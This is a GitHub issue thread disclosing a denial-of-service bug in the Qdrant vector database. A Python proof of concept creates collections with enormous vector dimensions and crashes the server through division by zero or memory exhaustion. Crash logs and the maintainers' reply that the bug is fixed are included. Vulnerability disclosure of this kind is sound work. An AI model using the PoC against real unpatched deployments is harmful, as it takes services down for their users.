Wrong dim when create collection may cause db service down

[360AIVul]

Wrong dim when create collection may cause db service down

Current Behavior

Denial of Service, Users can not use the vector database normally

Steps to Reproduce

some bugs related with the dim of vector when create collection, which can cause DoS
Details

version: 1.3.2

FPE

at https://github.com/qdrant/qdrant/blob/master/lib/segment/src/vector_storage/chunked_vectors.rs#L28, it check cannot be 0, but vector_size may be zero if dim too big such as 2**63. Then it will divide zero

OOM

if dim is too big, the vector::new will failed on my 128G memory server, and service will down.
PoC

from qdrant_client import QdrantClient
from qdrant_client import models

c = QdrantClient(host="127.0.0.1", port=6333)
c.recreate_collection(
    collection_name="test",
    vectors_config=models.VectorParams(size=2**63, distance=models.Distance.COSINE),
)

# [2023-05-30T08:25:32.996Z ERROR qdrant::startup] Panic occurred in file lib/segment/src/vector_storage/chunked_vectors.rs at line 28: attempt to divide by zero

c = QdrantClient(host="127.0.0.1", port=6333)
c.recreate_collection(
    collection_name="test",
    vectors_config={
        "payload": models.VectorParams(size=2**59, distance=models.Distance.DOT),
    }
)

#memory allocation of 2305843009213693952memory allocation of  bytes failed
#2305843009213693952 bytes failed
#Aborted (core dumped)

Possible Solution

check the value range

P.S This bug can also effect the cloud service

[generall]

what behavior would you expect in this case?

[360AIVul]

Hi, I think the running service can prompt the user that "the value is not appropriate" instead of the service crashing directly.

[generall]

Starting from what value it should become inappropriate?

[360AIVul]

Maybe we can compare the memory to be allocated with the free memory of the server, or use exception handling, or refer to the rfc 2116

[timvisee]

Fixed in #2544.

This will be part of the next feature/patch release.